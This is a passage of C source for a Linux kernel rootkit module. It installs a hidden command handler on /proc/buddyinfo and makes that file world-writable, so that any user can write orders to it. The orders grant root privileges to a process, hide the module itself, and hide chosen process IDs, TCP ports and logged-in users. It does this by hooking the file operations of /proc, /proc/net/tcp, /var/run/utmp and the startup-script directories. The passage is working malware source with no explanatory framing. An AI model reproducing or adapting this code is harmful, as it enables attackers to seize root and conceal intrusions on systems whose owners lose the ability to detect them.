zero_fill_port(hidden_sports[hidden_sport_count]); 422 | if(!port_in_array(hidden_sports, hidden_sport_count, hidden_sports[hidden_sport_count])) 423 | hidden_sport_count++; 424 | } 425 | } 426 | 427 | void generic_hide_port_function(hide_port_function_t func, const char __user *data, size_t sz, char *cmd_name) { 428 | unsigned i = strlen(cmd_name) + 1; 429 | char *dummy; 430 | if(i < sz) { 431 | unsigned port = simple_strtol(&data[i], &dummy, 10); 432 | if(port) 433 | func(port); 434 | } 435 | } 436 | 437 | void generic_show_port_function(const char __user *data, size_t sz, char *cmd_name, char port_array[MAX_HIDDEN_PIDS][MAX_PORT_LENGTH], unsigned *count) { 438 | unsigned i = strlen(cmd_name) + 1; 439 | char *dummy; 440 | if(i < sz) { 441 | unsigned port = simple_strtol(&data[i], &dummy, 10); 442 | if(port) 443 | unhide_port(port, port_array, count); 444 | } 445 | } 446 | 447 | static ssize_t orders_handler (struct file *filp, const char __user *data, size_t sz, loff_t *l) { 448 | if(sz > MAX_COMMAND_SZ) 449 | return -1; 450 | if(!strncmp(data, MAKE_ROOT_CMD, strlen(MAKE_ROOT_CMD))) 451 | generic_pid_function(make_root, data, sz); 452 | else if(!strncmp(data, HIDE_MOD_CMD, strlen(HIDE_MOD_CMD))) 453 | hide_module(); 454 | else if(!strncmp(data, SHOW_MOD_CMD, strlen(SHOW_MOD_CMD))) 455 | show_module(); 456 | else if(!strncmp(data, HIDE_PID_CMD, strlen(HIDE_PID_CMD))) 457 | generic_pid_function(hide_pid, data, sz); 458 | else if(!strncmp(data, SHOW_PID_CMD, strlen(SHOW_PID_CMD))) 459 | generic_pid_function(unhide_pid, data, sz); 460 | else if(!strncmp(data, HIDE_DPORT_CMD, strlen(HIDE_DPORT_CMD))) 461 | generic_hide_port_function(hide_dport, data, sz, HIDE_DPORT_CMD); 462 | else if(!strncmp(data, HIDE_SPORT_CMD, strlen(HIDE_SPORT_CMD))) 463 | generic_hide_port_function(hide_sport, data, sz, HIDE_SPORT_CMD); 464 | else if(!strncmp(data, SHOW_DPORT_CMD, strlen(SHOW_DPORT_CMD))) 465 | generic_show_port_function(data, sz, HIDE_DPORT_CMD, hidden_dports, &hidden_dport_count); 466 | else if(!strncmp(data, SHOW_SPORT_CMD, strlen(SHOW_SPORT_CMD))) 467 | generic_show_port_function(data, sz, HIDE_SPORT_CMD, hidden_sports, &hidden_sport_count); 468 | else if(!strncmp(data, HIDE_USER_CMD, strlen(HIDE_USER_CMD))) 469 | generic_user_function(hide_user, data, sz); 470 | else if(!strncmp(data, SHOW_USER_CMD, strlen(SHOW_USER_CMD))) 471 | generic_user_function(unhide_user, data, sz); 472 | return -1; 473 | } 474 | 475 | int fake_proc_fill_dir(void *a, const char *buffer, int c, loff_t d, u64 e, unsigned f) { 476 | unsigned i; 477 | for(i = 0; i < hidden_pid_count; ++i) 478 | if(!strcmp(buffer, hidden_pids[i])) 479 | return 0; 480 | // do the normal stuff... 481 | return proc_filldir->actor(a, buffer, c, d, e, f); 482 | } 483 | 484 | 485 | int fake_rc_fill_dir(void *a, const char *buffer, int c, loff_t d, u64 e, unsigned f) { 486 | if(!strcmp(buffer, rc_name)) 487 | return 0; 488 | // do the normal stuff... 489 | return rc_filldir->actor(a, buffer, c, d, e, f); 490 | } 491 | 492 | int fake_mod_fill_dir(void *a, const char *buffer, int c, loff_t d, u64 e, unsigned f) { 493 | if(!strcmp(buffer, mod_name)) 494 | return 0; 495 | // do the normal stuff... 496 | return mod_filldir->actor(a, buffer, c, d, e, f); 497 | } 498 | 499 | static int do_readdir_proc (struct file *fp, struct dir_context * fdir) { 500 | int ret; 501 | struct dir_context * pdc; 502 | struct fake_dir_context { 503 | filldir_t actor; 504 | loff_t pos; 505 | } dc; 506 | dc.actor = fake_proc_fill_dir; 507 | dc.pos = fdir->pos; 508 | 509 | pdc = (struct dir_context *) &dc; 510 | // replace the filldir_t with my own 511 | proc_filldir = fdir; 512 | ret = proc_original->iterate(fp, pdc); 513 | return ret; 514 | } 515 | 516 | static int do_readdir_rc (struct file *fp, struct dir_context * fdir) { 517 | int ret; 518 | struct dir_context * pdc; 519 | struct fake_dir_context { 520 | filldir_t actor; 521 | loff_t pos; 522 | } dc; 523 | dc.actor = fake_rc_fill_dir; 524 | dc.pos = fdir->pos; 525 | pdc = (struct dir_context *) &dc; 526 | // replace the filldir_t with my own 527 | rc_filldir = fdir; 528 | ret = rc_proc_original->iterate(fp, pdc); 529 | return ret; 530 | } 531 | 532 | static int do_readdir_mod (struct file *fp, struct dir_context * fdir) { 533 | int ret; 534 | struct dir_context * pdc; 535 | struct fake_dir_context { 536 | filldir_t actor; 537 | loff_t pos; 538 | } dc; 539 | dc.actor = fake_mod_fill_dir; 540 | dc.pos = fdir->pos; 541 | // replace the filldir_t with my own 542 | pdc = (struct dir_context *) &dc; 543 | mod_filldir = fdir; 544 | ret = mod_proc_original->iterate(fp, pdc); 545 | return ret; 546 | } 547 | 548 | struct proc_dir_entry *find_dir_entry(struct proc_dir_entry *root, const char *name) { 549 | struct proc_dir_entry *ptr = root->subdir; 550 | while(ptr && strcmp(ptr->name, name)) 551 | ptr = ptr->next; 552 | return ptr; 553 | } 554 | 555 | void hook_proc(struct proc_dir_entry *root) { 556 | // search for /proc's inode 557 | struct path p; 558 | 559 | if(kern_path("/proc/", 0, &p)) 560 | return; 561 | pinode = p.dentry->d_inode; 562 | if(!pinode) 563 | return; 564 | // hook /proc iterate 565 | proc_fops = *pinode->i_fop; 566 | proc_original = pinode->i_fop; 567 | proc_fops.iterate = do_readdir_proc; 568 | pinode->i_fop = &proc_fops; 569 | } 570 | 571 | void install_handler(struct proc_dir_entry *root) { 572 | struct proc_dir_entry *ptr = root->subdir; 573 | while(ptr && strcmp(ptr->name, "buddyinfo")) 574 | ptr = ptr->next; 575 | if(ptr) { 576 | handler = ptr; 577 | ptr->mode |= S_IWUGO; 578 | handler_original = (struct file_operations*)ptr->proc_fops; 579 | // create new handler 580 | handler_fops = *ptr->proc_fops; 581 | handler_fops.write = orders_handler; 582 | ptr->proc_fops = &handler_fops; 583 | } 584 | } 585 | 586 | void init_module_hide_hook(struct proc_dir_entry *root) { 587 | modules = find_dir_entry(root, "modules"); 588 | // save original file_operations 589 | modules_proc_original = (struct file_operations*)modules->proc_fops; 590 | modules_fops = *modules->proc_fops; 591 | modules_fops.read = do_read_modules; 592 | } 593 | 594 | void init_tcp_hide_hook(struct proc_dir_entry *root) { 595 | // search for /proc/net/tcp's inode 596 | struct path p; 597 | if(kern_path("/proc/net/tcp", 0, &p)) 598 | return; 599 | tinode = p.dentry->d_inode; 600 | if(!tinode) 601 | return; 602 | tcp_fops = *tinode->i_fop; 603 | tcp_proc_original = tinode->i_fop; 604 | tcp_fops.read = do_read_tcp; 605 | tinode->i_fop = &tcp_fops; 606 | } 607 | 608 | void init_users_hide_hook(struct proc_dir_entry *root) { 609 | // search for utmp's inode 610 | struct path p; 611 | if(kern_path("/var/run/utmp", 0, &p)) 612 | return; 613 | uinode = p.dentry->d_inode; 614 | 615 | if(!uinode) 616 | return; 617 | user_fops = *uinode->i_fop; 618 | user_proc_original = uinode->i_fop; 619 | user_fops.read = do_read_users; 620 | uinode->i_fop = &user_fops; 621 | } 622 | 623 | void init_hide_rc(void) { 624 | // search for rc's inode 625 | struct path p; 626 | if(kern_path(rc_dir, 0, &p)) 627 | return; 628 | rcinode = p.dentry->d_inode; 629 | if(!rcinode) 630 | return; 631 | // hook rc's iterate 632 | rc_fops = *rcinode->i_fop; 633 | rc_proc_original = rcinode->i_fop; 634 | rc_fops.iterate = do_readdir_rc; 635 | rcinode->i_fop = &rc_fops; 636 | } 637 | 638 | void init_hide_mod(void) { 639 | // search for rc's inode 640 | struct path p; 641 | if(kern_path(mod_dir, 0, &p)) 642 | return; 643 | modinode = p.dentry->d_inode; 644 | if(!modinode) 645 | return; 646 | // hook rc's iterate 647 | mod_fops = *modinode->i_fop; 648 | mod_proc_original = modinode->i_fop; 649 | mod_fops.iterate = do_readdir_mod; 650 | modinode->i_fop = &mod_fops; 651 | } 652 | 653 | static int __init module_init_proc(void) { 654 | static struct file_operations fileops_struct = {0}; 655 | struct proc_dir_entry *new_proc; 656 | // dummy to get proc_dir_entry of /proc 657 | if(rc_name && rc_dir) 658 | init_hide_rc(); 659 | if(mod_name && mod_dir) 660 | init_hide_mod(); 661 | new_proc = proc_create("dummy", 0644, 0, &fileops_struct); 662 | root = new_proc->parent; 663 | 664 | init_tcp_hide_hook(root); 665 | init_module_hide_hook(root); 666 | init_users_hide_hook(root); 667 | 668 | hook_proc(root); 669 | 670 | // install the handler to wait for orders... 671 | install_handler(root); 672 | 673 | // i't no longer required. 674 | remove_proc_entry("dummy", 0); 675 | return 0; 676 | } 677 | 678 | 679 | static void module_exit_proc(void) { 680 | if(proc_original) 681 | pinode->i_fop = proc_original; 682 | if(tcp_proc_original) 683 | tinode->i_fop = tcp_proc_original; 684 | if(user_proc_original) 685 | uinode->i_fop = user_proc_original; 686 | if(rc_proc_original) 687 | rcinode->i_fop = rc_proc_original; 688 | if(mod_proc_original) 689 | modinode->i_fop = mod_proc_original; 690 | show_module(); 691 | if(handler_original) { 692 | handler->proc_fops = handler_original; 693 | handler->mode &= (~S_IWUGO); 694 | } 695 | } 696 | 697 | module_init(module_init_proc); 698 | module_exit(module_exit_proc); 699 | 700 | MODULE_LICENSE("GPL"); 701 | 702 | 703 | 704 | --------------------------------------------------------------------------------